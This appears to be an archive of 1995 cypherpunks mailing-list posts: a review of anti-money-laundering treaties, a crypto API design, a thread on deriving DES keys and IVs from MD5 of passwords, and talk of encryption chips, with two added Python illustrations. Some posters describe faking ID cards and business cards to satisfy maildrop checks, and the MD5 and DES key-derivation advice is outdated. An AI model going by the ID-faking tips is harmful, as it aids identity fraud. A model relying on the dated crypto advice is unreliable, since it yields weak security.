logs recording which IP addresses I was coming from.

Nowadays, a $10-20/mo maildrop at places like "Mailboxes, Etc" works fine.
(although there's still the possibility of them nabbing you when you go
to pick up the mail)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Tue, 15 Aug 95 07:45:41 PDT
To: cypherpunks@toad.com
Subject: Free Life article
Message-ID: <8975.9508151445@gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain





The article below, about money laundering, is taken from 
the latest issue of Free Life, the journal that I edit.  
If you like it and want to read more, send a $5 
dollar bill to the Editorial address at the bottom 
of this text.  If you want to read lots more, send me 
$20 for a four issue subscription.

Comments always welcome!


Sean Gabb
Editor
Free Life
London
25th July 1995

                  A R T I C L E   B E G I N S
=====================================================================
International Efforts to Combat Money Laundering

William C. Gilmore (ed.)

Grotius Publications Limited, Cambridge, 1992, 335pp, 48 (pbk)

(ISBN 0 521 46305 X)

Money Laundering:  A Practical Guide to the New Legislation

Rowan Bosworth-Davies and Graham Saltmarsh

Chapman & Hall, London, 1994, xii and 304pp, 49.50 (hbk)

(ISBN 0 412 57530 2)


The first of these books is a collection of treaties, plus other
documents, concerned with the international fight against money
laundering.  The second explains how these treaties have been enacted
into, and are enforced under, the laws of the United Kingdom.  Both
works will repay the closest study.  In clear detail, they show the
growth of what must be called a New World Order, and how, without
some interposing cause, this may produce a universal slide into
despotism.

The fight against money laundering begins with realising that the
"War on Drugs" has been lost.  When goods are portable and easily
concealed, and when demand for them is strong enough to bear almost
any cost of bringing them to market, the main effect of prohibition will
be to put a bounty on crime.  For all the efforts of the past three
generations, illegal drugs are available in most high security prisons. 
In much of the West, street prices have been stable or even falling
since 1980.

The official response, however, has not been to give in and legalise the
trade, but to expand the War to a front where previously there had
been few hostilities.  While keeping up their efforts against the trade
itself, the authorities have turned increasingly to confiscating its
proceeds.  This new approach has three alleged benefits:

First, it will deprive criminals of their incentive to enter and remain
in the trade;

Second, it will allow the punishing of those in charge of the trade -
people who never touch or see illegal drugs, but to whom the main
profits ultimately flow;

Third, it can make the War on Drugs self-supporting, and perhaps
yield a surplus for other public spending.

There is, however, one practical difficulty.  Before the authorities can
confiscate the money, they must find it.  To do this, they must keep it
from being merged beyond recall into the general flow of investment. 
This involves ending bank secrecy and imposing a mass of financial
regulation.  Now, most people - especially the rich - dislike having
their lives pried into.  Nor do banks like higher costs and limitations
on what business they can do.  And so, given the present freedom of
capital markets, no government acting alone can afford a strict policy
of confiscation.  It would, sooner or later, cause a flight of transactions
to more liberal places.

The solution has been to try making everywhere in the world equally
illiberal.  Such  was the purpose of the United Nations Convention
Against Illicit Traffic in Narcotic Drugs and Narcotic Substances,
signed in Vienna in December 1988 [full text in Gilmore, pp.75-97]. 
This is one of the most important international treaties of the past 50
years.  It not merely requires its signatory states to criminalise the
laundering of drug money, and to confiscate it where found, but lays
down so far as possible a common wording for the criminal statutes,
and a common mode of enforcement.  It also requires full and prompt
cooperation between the signatory states for the enforcement of these
laws anywhere in the world.

The Convention had little direct or immediate effect on British law. 
Many of its requirements, indeed, had already been met in the Drug
Trafficking Offences Act 1986.  Most others were only met in the
Criminal Justice Act 1993, which enacts the European Community
Directive of 1991 on the Prevention of the Use of the Financial System
for the Purpose of Money Laundering [full text in Gilmore, pp.250-67]. 
This itself derives from the Vienna Convention only through the
Council of Europe Convention on Laundering, Search, Seizure and
Confiscation of the Proceeds from Crime 1990 [full text in Gilmore,
pp.177-91].  Even so, this country is fast becoming a financial police
state of the kind agreed at Vienna - and where the process cannot be
traced to the Convention, it can be traced to the same international
pressures of which the Convention is itself a result.

Let me explain.  When I talk about a New World Order, I do not mean
some grand conspiracy of bankers, or Jews, or Illuminati, or even -
with far more probability - the American Government.  There are
countries where policy is largely dictated from outside.  But for rich
and powerful countries, the truth is more complex.  Most international
obligations imposed on this country, for example, were not only
consented to by our rulers, but were usually proposed by them, and
are enforced by agencies in which our own countrymen often occupy
senior positions.

Where others see conspiracies, I see public choice economics. 
Whenever a government tries to do something dangerous or
unnecessary, like banning drugs or educating the poor, it must set up
an agency through which to spend the allocated funds.  Once
employed, the agents will - as if directed by an invisible hand - start
to find more and more justifications for expanding their status and
numbers.  They collect the statistics.  They know which ones to
publish and which to hold back.  They are the politicians' first and
favoured source of advice.  They have their pet journalists.  They trade
favours with the relevant interest groups.  They know exactly how to
give themselves a pleasing life, and how to see off threats to it. 
Unless the money runs out, or the public turns really nasty, they can
write their own budget cheques.

By natural extension, the same is now happening at the international
level - though with potentially far worse consequences.  In the first
place, there is limitless money:  budgets would need to swell
unimaginably large to reach even one per cent of gross planetary
product.  In the second, public anger seldom crosses borders; and, if all
else fails, the politicians and bureaucrats in one country can shelter
behind the excuse of treaty obligations that cannot be unilaterally
cast off - not, at least, without consequences more horrible than words
exist to describe.  Third, the enforcement of international treaties
means the growth of what is in effect an international bureaucracy. 
The local enforcers of a treaty may be citizens of the signatory states,
who will live and work in their home countries, and may even occupy
positions in the domestic administration.  Yet these are people who,
by virtue of the agreements they enforce, and the contacts they make
and maintain in other countries, are members of an international
order.  And, in at least the case of money laundering, they will share
an agenda that is often deeply hostile to their native institutions.

This can be seen - expressed with almost naive honesty - in the book
by Messrs Bosworth-Davies and Saltmarsh.  Both are British police
officers:  the latter is a departmental head at the National Criminal
Intelligence Service.  Both take it for granted that the world needs an
international police force.  Both are unable to believe that anyone can
disinterestedly object to the necessary harmonisations of law, and the
corresponding abolition of Common Law protections.  They "know one
senior clearing banker who has described this [money laundering]
legislation as the nearest thing he has experienced to
'McCarthyism'...".[p.172]  Of course, they see things differently.  The
legislation

     discloses, on mature reflection, a set of carefully structured
     laws which, with good will, due diligence and a modicum of
     responsible attention from the industry as a whole, should
     not prove too burdensome.  Indeed, the authors believe that
     some of the regulatory requirements have been diluted too
     much already, in a misguided attempt to placate the
     sensibilities of certain sectors of the industry....[Ibid.]

With people like this advising the politicians and lecturing the rest of
us, little wonder the Drug Trafficking Offences Act predates the
Vienna Convention by two years!  Though they will hotly disagree -
and even perhaps consider a libel writ - Messrs Bosworth-Davies and
Saltmarsh cannot be regarded as our countrymen.  More at home in
a gathering of Bulgarian or Filipino police chiefs than with any of us,
they are foreigners with British passports.

Somewhat less honest, though still interesting, is the Explanatory
Report of the Committee of Experts who drafted the Council of Europe
Convention [full text in Gilmore, pp.192-237].  Though formally
subordinate to a committee of the various European Ministers of
Justice, these experts plainly saw their first duty as lying elsewhere. 
Call it "the international community" or their own order, their duty
was collective and not to any single country.

Look at their dislike of the narrow focus of the Vienna Convention. 
They wanted something that would also allow confiscation for

     terrorist offences, organised crime, violent crimes, offences
     involving the sexual exploitation of children and young
     persons, extortion, kidnapping, environmental offences,
     economic fraud, insider trading and other serious offences.
     [Gilmore, p.204]

But they had to concede that not every European country might like
its own laws against these acts to be written by an international
committee.  And so they allowed each signatory state to reserve
whatever of these acts to its own legislative process.

     The experts agreed, however, that such states should
     review their legislation periodically and expand the
     applicability of confiscation measures, in order to be able
     to restrict the reservations subsequently as much as
     possible. [Ibid.]

And this is only the beginning.  As yet, the shape of world government
exists barely in outline.  But the tendency ought to be plain.  Power
is moving from national - and mostly democratic - governments to
unaccountable and even invisible bureaucracies.  Liberal institutions
that are often the work of ages are being hammered into the
transmitters of unlimited power.  We are beginning to know how
people in the Greek city states felt after absorption into the Roman
Empire.

When the American militiamen cry out that the United Nations is
about to invade in black helicopters and plant microcomputers in their
bottoms, I am at least sceptical.  This is not the New World Order that
I see.  What I do see is actually worse.  We can shoot the helicopters
down, and dig out the microcomputers, and put the ringleaders on
trial.  We can go about playing the hero of our choice from Star Wars. 
But in the real world, there is no Death Star to blow up - no Darth
Vader to push into the void.  There is just a huge, elastic network of
people, all acting in what they believe is the public good, most with
some degree of public support.

How this kind of despotism can be resisted is another question, and I
have said enough already.  But I will repeat - the books here reviewed
do repay a very close study.  At the very least, it is useful to see the
enemy's future plan laid out in such detail.

Sean Gabb
======================================================================
    $$$$$$  $$$$$   $$$$$$  $$$$$$     $$      $$   $$$$$$  $$$$$$
    $$      $$   $  $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$$$    $$$     $$$$    $$$$       $$      $$   $$$$    $$$$
    $$      $$ $    $$      $$         $$      $$   $$      $$
    $$      $$  $   $$      $$         $$      $$   $$      $$
    $$      $$   $  $$$$$$  $$$$$$     $$$$$$  $$   $$      $$$$$$
 
        A Journal of Classical Liberal and Libertarian Thought

    Production:                                   Editorial:
    c/o the Libertarian Alliance                  123a Victoria Way
    25 Chapter Chambers                           Charlton
    London SW1P 4NN                               London SE7 7NX

Tel: **181 858 0841  Fax: **171 834 2031  E-mail: cea01sig@gold.ac.uk

                    EDITOR OF FREE LIFE:  SEAN GABB
______________________________________________________________________

How to subscribe:  Send cheque for GBP10 or US$20 made out to the
                   Libertarian Alliance.
======================================================================
                 FOR LIFE, LIBERTY AND PROPERTY
======================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip R. Moyer <prm@rome.isl.sri.com>
Date: Tue, 15 Aug 95 15:43:50 PDT
To: cypherpunks@toad.com
Subject: RC4 key search report
Message-ID: <9508152243.AA17885@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Are there any technical reports available describing the RC4 key search
efforts?  I am interested specifically in number of machines (compute
power) and time to completion.

Cheers,
Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 15 Aug 95 16:51:56 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: CoS Raid on "Copyright Terrorist"
Message-ID: <199508152000.QAA14285@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:17 PM 8/15/95 CDT, Mike McNally wrote:

>Mailboxes Etc. insists on getting a picture ID; at least they did last
>time I checked.  Some smaller mom&pop places will take a business card
>(time to break out your Jim Rockford Business Card Fabrication Kit).

I always supply picture ID these days.  It's really rough getting those cold
lamination-Employee ID kits from Office Depot, taking the polaroid on a blue
background, trimming the photo, and assembling the employment ID.  I'm one
of my best employees.

Don't forget to include your EMP_NO.  It gives the clerk something to write
down.

DCF

"Governments are simply not fully sovereign in the world of information;
their powers within it are strangely limited....This weakness of government
control within computer nets--a product of strongly protected privacy, a
lack of frontiers and confusions of jurisdiction--make them natural places
for subversion." -- The Economist "Softwar--A Survey of Defence Technology"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 15 Aug 95 07:30:11 PDT
To: cypherpunks@toad.com
Subject: Re: You are being monitored
In-Reply-To: <ac556f2801021004b2f7@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.950815161444.9279A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



> The manufacturer is apparently acting as the collection point, and any name
> can be put into the From: field.

Then, effectively, Quasar is a new(?) kind of remailer.
There was no got.net in the headers I could see. The
next question is how they log incoming agents.

Mats






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ray Cromwell" <s5cromw@watson.ibm.com>
Date: Tue, 15 Aug 95 13:51:27 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Object Oriented Crypto API
In-Reply-To: <199508031625.JAA11761@jobe.shell.portal.com>
Message-ID: <9508152050.AA21250@play.watson.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



Sorry I took so long to respond.

Hal wrote:
> I enjoyed Ray's message about the crypto library interface.  I haven't
> had time to study it closely, but I have a couple of quick comments:
>
> I thought Wei's library looked pretty easy to use already.  Maybe Ray
> could show an example of what would be needed with Wei's library to do
> some "typical" crypto function, say encrypting a message with someone
> else's RSA key.  Then we could compare it with how the same function
> would look with Ray's proposed interface.

  Wei's library is easy to use from a certain standpoint. It depends
on an ASN.1 stream paradigm to stack cryptographic layers. However, I
think it is lacking in certain areas which makes it difficult
to use, and it is completely missing many functions such as
key distribution and management.

To RSA encrypt with Wei's library, you have to open the key file
(or read it into memory somehow), and instantiate a "BufferedTransformation"
which is a sort of internal stream library. Then you construct
a RSAPublicKey object around the BufferedTransformation, then you
generate a random blockcipher key, and tell the RSAPublicKey object
to encrypt it. Next, you encode your plaintext with the block cipher
separately using the blockcipher key. I'm going to ignore the
actual syntax of Wei's library for the moment (because I don't remember
it) and use pseudo code.

key_data_stream = FileSource("publickey.data") /* like ifstream() */
RSAPublicKey rsa_object(key_data_stream);
random_blockcipher_key = /* generate the key somehow, note, key generation
                            is not standardized across all encryption
                            algorithms, so the application writer
                            must know how to generate the session key
                            manually */
rsa_object.Encrypt(random_blockcipher_key, encryptedkey);
DESEncryption desenc(random_blockcipher_key);
desenc.ProcessBlock(plaintext, ciphertext);
/* write "encryptedkey" and "ciphertext" somewhere */






Under my scheme, it would look something like this

/* we are given PlainText p, a KeyID which is of the format
   KeyID ::= identifier ['::' keyserver]
   identifier ::= RFC822_EMAIL_ADDR | HEX_STRING;
   keyserver ::= FULLY_QUALIFIED_DOMAIN_NAME;

   example: "Ray Cromwell" <rjc@clark.net>::keyserver.com
   we are doing RSA encryption with DES
*/

DESEncryptionAlgorithm des;
RSAEncryptionAlgorithm rsa(des);

Encrypt(rsa, KeyId, p, c);




Here's the explanation of what's going on underneath (refer to
my OO Crypto API article if needed)

DES is a BlockCipherEncryptionAlgorithm (child of EncryptionAlgorithm)
RSA is a PublicKeyEncryptionAlgorithm (also a child of EncryptionAlgorithm)
that expects to be constructed with a BlockCipherEncryptionAlgorithm
because it uses a blockcipher as the underlying encryption technique
and only encrypts the session key. Any old BlockCipherEncryptionAlgorithm
will do, DES, IDEA, etc. RSA doesn't care.

Encrypt() is a global function which takes as its first argument
an EncryptionAlgorithm, second, a KeyID, and third/fourth a plaintext
and ciphertext tokenized stream (to be explained later). Encrypt()
doesn't care what the cryptosystem is, it's a single entry point
for the application developer.

Encrypt's pseudocode looks like this

Encrypt(EncryptionAlgorithm encalg, KeyID kid, Plaintext p, Ciphertext c)
{
    KeyDomain kdom=encalg.GetKeyDomain(kid);
    EncryptionKey ek = GetKey(kdom, kid);
    encalg.encrypt(ek, p, c);
}

Line 1 asks the EncryptionAlgorithm (whatever type it really is), to
return a KeyDomain for that cryptosystem. A KeyDomain is an abstract
universal object for fetching any key type from any place. It could
for instance, be fetching the key from a disk file, from an email
signature, or an internet key server.

Line 2 calls a global key management function GetKey which queries
a KeyDomain with the KeyID to return an EncryptionKey.

Line 3 calls the encrypt function on the EncryptionAlgorithm.

I have toyed with other interfaces. For instance, since we want to
support the definition of new KeyDomain types, we really should allow
an overloaded Encrypt where the EncryptionKey is passed as an argument,
so that the application developer can use third party KeyDomains.

Every EncryptionAlgorithm (hereafter abbreviated EA, where DA is
a DecryptionAlgorithm) knows how to generate a KeyPair which
contains an encryption and decryption key such that
DA(keypair.decryption_key, EA(keypair.encryption_key, plaintext)) == plaintext
Whether the cipher is symmetric or not is irrelevant. The RSAEncryptionAlgorithm
encrypt() function basically calls generate_key() on the block cipher
and uses that as the session key. Application developers are shielded
from the representation of keys and the generation of them.


The real dream is to have a generic crypto library which can encrypt
anything using any algorithm fetching keys from any medium and
reading and writing any valid crypto file format. Application developers
could write code to operate on PGP file formats, RSAREF, PEM, or
anything without having to know anything about those formats at all.
The only thing that is standardized is the KeyID format. Sort of
a Universal Resource Name (URN) for key identification. Perhaps
"key://keyserver.domain/keyid" would be better.


Reading and Writing any file format
-----------------------------------
  How would an application be able to operate on a RIPEM message, and a
PGP file without knowing about the format of either?

  The general scheme is to use a tokenized stream which records
what has been done to the plaintext, and then some stream encoding
objects which "map" the stream to the local format as long as the
stream is consistent with the algorithms the file format supports. Think
of the stream as a string in a regular language (in the sense of automata
theory). The stream "mapper" is a deterministic finite automaton
which processes the "string" (the stream tokens) and determines
1) whether the string is acceptable by the language (file format)
it's mapping to, and 2) generates side effects which write out the
format to a buffer or file.

Consider the following symbol set,
S={ RSA_ENCRYPTION, PUBLICKEY_REF, DES_ENCRYPTION, IDEA_ENCRYPTION }

A tokenized stream might look like

RSA_ENCRYPTION PUBLICKEY_REF [pkey data] [encrypted session key]
DES_ENCRYPTION [ciphertext]

A PGPEncoder would reject this stream because it doesn't use IDEA.


Encoders would have the job of verifying consistency of the
stream with the underlying file format, and also whether or not
the stream was encoded properly in the first place. If the
stream is invalid, exceptions are thrown. If some tokens are
missing (such as a timestamp), the Encoder can supply them.

> The other point is that there needs to be the ability to encrypt only
> a bit of a message at a time.  Particularly with public key the first
> message may be special in that it generates a session key which is used
> for the remainder.  So an interface for piecewise encryption and
> decryption is necessary.

The way to do this is to provide secondary interfaces across all
Algorithms which allow the operations of Init, Update, and Finalize,
much like RSA's MD5 interface operates.

-Ray
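
The tokenized-stream idea from the message above, as an added example that is not part of the original post and is not Ray's code: an encoder is a finite automaton over the token kinds, and a PGP-style encoder rejects the RSA+DES stream while a DES-based one accepts it. The `Token`, `Encoder` and `DesFormatEncoder` names, the `DATA` token for the bracketed payloads, and the tagged-record output layout are all assumptions made for the illustration.

```python
from dataclasses import dataclass

# Symbol set S from the message; DATA (an assumption) stands for the
# bracketed payloads such as [pkey data] and [ciphertext].
RSA_ENCRYPTION = "RSA_ENCRYPTION"
PUBLICKEY_REF = "PUBLICKEY_REF"
DES_ENCRYPTION = "DES_ENCRYPTION"
IDEA_ENCRYPTION = "IDEA_ENCRYPTION"
DATA = "DATA"


@dataclass(frozen=True)
class Token:
    kind: str
    payload: bytes = b""


class StreamRejected(Exception):
    """The token stream is not a string in the encoder's language."""


class Encoder:
    """Deterministic finite automaton over token kinds.

    Each state is named for what it expects next. A transition may carry a
    one-byte tag; when it does, the token's payload is written to the output
    as tag + 4-byte length + payload. That record layout is invented for
    this example and is not a real file format.
    """

    name = "Encoder"
    block_ciphers = frozenset()  # block-cipher tokens the format allows

    def transitions(self):
        cipher_edges = {c: ("ciphertext", None) for c in self.block_ciphers}
        return {
            "start": {RSA_ENCRYPTION: ("keyref", None)},
            "keyref": {PUBLICKEY_REF: ("keydata", None)},
            "keydata": {DATA: ("session_key", b"K")},
            "session_key": {DATA: ("cipher", b"S")},
            "cipher": cipher_edges,
            "ciphertext": {DATA: ("accept", b"C")},
            "accept": {},  # anything after the ciphertext is rejected
        }

    def encode(self, stream):
        table = self.transitions()
        state, out = "start", bytearray()
        for pos, tok in enumerate(stream):
            edge = table[state].get(tok.kind)
            if edge is None:
                raise StreamRejected(
                    f"{self.name}: {tok.kind} not allowed at token {pos} "
                    f"(state {state!r})")
            state, tag = edge
            if tag is not None:
                # Side effect of the transition: emit one output record.
                out += tag + len(tok.payload).to_bytes(4, "big") + tok.payload
        if state != "accept":
            raise StreamRejected(f"{self.name}: stream ended in state {state!r}")
        return bytes(out)


class PGPEncoder(Encoder):
    name = "PGPEncoder"
    block_ciphers = frozenset({IDEA_ENCRYPTION})


class DesFormatEncoder(Encoder):  # hypothetical DES-based format
    name = "DesFormatEncoder"
    block_ciphers = frozenset({DES_ENCRYPTION})


def sample_stream(cipher):
    """Constructed stream in the shape shown in the message."""
    return [
        Token(RSA_ENCRYPTION), Token(PUBLICKEY_REF),
        Token(DATA, b"pkey"), Token(DATA, b"sesskey"),
        Token(cipher), Token(DATA, b"ciphertext"),
    ]


def accepts(encoder, stream):
    """True if the encoder's automaton accepts the whole stream."""
    try:
        encoder.encode(stream)
        return True
    except StreamRejected:
        return False


if __name__ == "__main__":
    des = sample_stream(DES_ENCRYPTION)
    print(accepts(PGPEncoder(), des))
    print(accepts(DesFormatEncoder(), des))
    print(PGPEncoder().encode(sample_stream(IDEA_ENCRYPTION)))
```
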



From owner-cypherpunks  Tue Aug 15 15:06:28 1995



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt7508b@prism.gatech.edu (PHrEaK!)
Date: Tue, 15 Aug 95 15:06:28 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: Purple Boxes
In-Reply-To: <199508112044.NAA12959@netcom19.netcom.com>
Message-ID: <199508152206.SAA23244@acmex.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> it would be called the "purple box" because I have not heard
> of any other devices called "purple boxes" (i.e. this string
> in the "colorful" hacker namespace does not seem to be used up yet)
> and also the famous WWII compromised japanese diplomatic codes 
> were called Purple.
This isn't very important, but there actually is a purple box, but
like many boxes hogging up "colorspace" this one isn't too exciting.
It's a telephone hold button... (woo woo)
> one of the problems is that serious crypto chips are pretty
> expensive. but an analog scrambler would actually be a decent
> start on all this, and I bet it could be built pretty cheaply.
Does anyone know of sources for des chips???
Are there any public key chips out there???
Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
slow for realistic real time hardware voice/data encryption??)
I know a little about digital electronics (I am a computer engineering
student) and I would love to get some data books and see if I could
come up with a secure "encryption box" that people could build. 
Obviously such things are available from AT&T, etc... but they come at
a premium due to the fact that people who need such security normally
have the cash for it. A little public key encryption box that is
arguably easy to construct and costs less than $50 in parts would
catch on fast in the hacker world. At that point, someone would go into
business selling the things, as companies did with blue boxes (remember
how apple computers got started?) and red boxes (look in 2600 marketplace.)
Please anyone send me info on possible vendors/databooks and I will definitely
look into this.

-- 
=-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=-
-=-=-=-=-=- TWN615@mindvox.phantom.com  GT7508B@prism.gatech.edu =-=-=-=-=-=-=
=- "Government is not a reason, not an eloquence; it is a force. Like fire, =-
-=- it is a dangerous servant and a fearful master." -- George Washington -=-=



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Tue, 15 Aug 95 15:41:16 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Use of the IV in DES & stuffing the first block w/ random stuff
In-Reply-To: <199508152039.NAA15590@ix7.ix.netcom.com>
Message-ID: <SAA03523.199508152240@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508152039.NAA15590@ix7.ix.netcom.com>, Bill Stewart writes:
>At 09:52 AM 8/15/95 -0400, you wrote:
>>I have recently started writing a small pair of encryption and
>>decryption programs.  I was planning on generating the key by
>>taking the MD5 of the text password supplied by the user.
>
>A reasonable approach, but be careful in your implementation.
>I haven't seen the book "A Million Wimpy Passwords and their MD5s" yet,
>but the CD-ROM version may be out soon :-)  And you can probably
>ftp it from dockmaster.

I don't know what can be done here other than encouraging the user
to use a long password.

[...]
>IVs are designed to let you put random stuff in them to discourage
>known-plaintext attacks, replay attacks, etc.   However, suppose you
>take a known 64 bits from MD5(password) and put them in the IV -
>instead of the Bad Guy needing to brute-force 168-bit-deep Triple DES,
>he gets to brute force MD5s of human-selected passwords instead,
>which makes a lot of pre-computation possible.

Don't I need to know what goes into the IV?  I can't just stick
random stuff in it - I need to stick something that is a function
of the passphrase into it (or make the user remember something
my program spits out).

>Also, for 3-Key Triple-DES, how do you get 168 bits of key from
>128bits of MD5?  (for 2-Key 3-DES, you only need 112 bits...)
>If you do something like M1=MD5(Key), M2=MD5(M1,Key), realize 
>you've got at most 128 bits of real key instead of 168, 
>though that probably needn't worry you too much...

Oh, I was going to do a MD5 of half of the passphrase to get one
key pair, then MD5 the other half to get another key, and that
left about 64 bits to play with....

[...]
>>Or am I better off putting the extra 64 bits of "key" into the IV,
>>and generating a strong random number to stuff in the first block
>>- since the decoder can just ignore that block anyway.
>Put the strong random number in the IV, if you've _got_ a source
>of strong random numbers...

Don't I need to reproduce the same IV during the decryption?

>You might want to do something fancy like choose a random salt,
>use the salt for the IV, and use MD5(salt,human-selected-key) for the key.
>This makes pre-computation much less useful (unless you're careless
>and use MD5(key,salt) instead of MD5(salt,key)...), and means that
>you use a different session key for each batch of stuff you encrypt,
>even though you're using the same key.  If you're paranoid about replay
>attacks, you could let some of the bits of the salt be random and some 
>be a counter, and never accept a key smaller than the one from the
>previous successfully-decrypted message.

Hmmmm, so I should put the salt in the clear at the start of the file?
This looks like an interesting idea.

(it occurs to me that I never mentioned what my "sample application"
was - I was thinking of encrypting backup tapes so they can safely
be transported off site and stored.)
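
The layout discussed in this exchange, as an added example that is not part of the original messages: a salt written in the clear at the start of the file doubles as the IV, and the key is MD5(salt, passphrase), so the reader can rebuild both from the file and the passphrase. The 4+4 byte random/counter split, the function names and the strictly-increasing counter check are assumptions; `stretched_key` is a slow KDF shown as a present-day alternative that the thread does not mention.

```python
import hashlib
import os
import struct

SALT_LEN = 8  # one DES block, so the salt can be used directly as the IV


def unsalted_key(passphrase):
    """The first plan in the thread: key = MD5(passphrase).

    The same passphrase always gives the same key, so a table of MD5s of
    common passwords, computed once, applies to every file.
    """
    return hashlib.md5(passphrase).digest()


def salted_key(salt, passphrase):
    """The suggested scheme: key = MD5(salt, passphrase), salt first.

    16 bytes of output: enough for 2-key Triple DES, short of 3-key.
    """
    return hashlib.md5(salt + passphrase).digest()


def stretched_key(salt, passphrase, rounds=100_000):
    """Not from the thread: same salt, but a deliberately slow KDF."""
    return hashlib.pbkdf2_hmac("sha256", passphrase, salt, rounds, dklen=16)


def make_salt(counter, rand=None):
    """4 random bytes followed by a 4-byte big-endian counter."""
    rand = os.urandom(4) if rand is None else rand
    if len(rand) != 4:
        raise ValueError("rand must be 4 bytes")
    return rand + struct.pack(">I", counter)


def seal_header(passphrase, counter, rand=None):
    """Writer side: returns (header, key). The header is stored in the
    clear at the start of the file and is also the IV."""
    salt = make_salt(counter, rand)
    return salt, salted_key(salt, passphrase)


def open_header(blob, passphrase, last_counter):
    """Reader side: recover (iv, key, counter) from the start of the file.

    The counter must be strictly greater than the last one accepted, so a
    re-sent copy of an old file is refused before any decryption is tried.
    """
    if len(blob) < SALT_LEN:
        raise ValueError("file shorter than the salt header")
    salt = blob[:SALT_LEN]
    counter = struct.unpack(">I", salt[4:])[0]
    if counter <= last_counter:
        raise ValueError("stale counter: possible replay")
    return salt, salted_key(salt, passphrase), counter


if __name__ == "__main__":
    # Constructed inputs: two backups under one passphrase get distinct keys.
    hdr1, key1 = seal_header(b"correct horse", 1)
    hdr2, key2 = seal_header(b"correct horse", 2)
    print(key1.hex(), key2.hex(), key1 != key2)
    print(open_header(hdr2 + b"<ciphertext>", b"correct horse", 1)[2])
```
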




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Tue, 15 Aug 95 15:49:49 PDT
To: gt7508b@prism.gatech.edu (PHrEaK!)
Subject: Re: Purple Boxes
In-Reply-To: <199508152206.SAA23244@acmex.gatech.edu>
Message-ID: <SAA03565.199508152249@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508152206.SAA23244@acmex.gatech.edu>, PHrEaK! writes:
[...]
>> one of the problems is that serious crypto chips are pretty
>> expensive. but an analog scrambler would actually be a decent
>> start on all this, and I bet it could be built pretty cheaply.
>Does anyone know of sources for des chips???

CEI makes a "Super Crypt Chip" that does single and triple DES,
I believe you can clock it at 25Mhz and get 32bits of cyphertext
out per cycle in single DES mode, it is somewhat slower (but not
three times slower) in triple DES mode.  I believe that's what
UUNET uses in their LanGuardian product.  I have the spec sheet in
a box somewhere if anyone needs the part number.   Definitely
more than fast enough to encrypt voice traffic.

>Are there any public key chips out there???

I think NEC makes one.  I know AT&T makes one.  DEC had some, but
they may not have been a commercial product.  Sorry I don't have part
numbers, and haven't read a spec sheet for any of them.

>Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
>slow for realistic real time hardware voice/data encryption??)

DEC had a chip in the lab that could RSA encrypt/decrypt at a rather
high speed, unfortunately I don't recall the speed - something like
a DS0's worth (or it may have been as low as 32Kbits/sec worth) - less
than a T1.

I have no doubt that there are some very fast hardware IDEA chips
(which is what I think you need to make go fast to get a hardware
PGPphone to go fast - well the codec as well)

>I know a little about digital electronics (I am a computer engineering
>student) and I would love to get some data books and see if I could
>come up with a secure "encryption box" that people could build. 
>Obviously such things are available from AT&T, etc... but they come at
>a premium due to the fact that people who need such security normally
>have the cash for it. A little public key encryption box that is
>arguably easy to construct and costs less than $50 in parts would
>catch on fast in the hacker world. At that point, someone would go into
>business selling the things, as companies did with blue boxes (remember
>how apple computers got started?) and red boxes (look in 2600 marketplace.)
>Please anyone send me info on possible vendors/databooks and I will definitely
>look into this.

I'm afraid it won't be $50 worth of parts until you start buying
thousands of chips at once.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Tue, 15 Aug 95 20:39:26 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: An article for Wired magazine
Message-ID: <8AF3490.0003000322.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


PE> kilos of gold in it if $50,000 in cash doesn't suit your tastes. I
PE> defy governments to eliminate gold as well as paper currency.

  Um. Didn't FDR try that?


 * Free will made me do it!
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 15 Aug 95 20:12:47 PDT
To: die@die.com
Subject: Re: Purple Boxes
Message-ID: <v02120d03ac571f5b265d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:30 8/15/95, Dave Emery wrote:

>        I'm quite convinced that with a fast microcontroller and
>especially a really fast DSP engine you can do both 3-DES and idea in
>the same hardware that does the rest.
[...]
>        I should think realistically there should be a lot of bandwidth
>left over for the voice compression - for the encryption you might
>possibly be talking 5% of the dsp cpu if you use a 50 mhz part.

I agree. You can easily do encryption and compression on the same chip.
There is no need for a separate DES/RSA chip. I only included some possible
DES chip manufacturers, because the original poster asked for them.


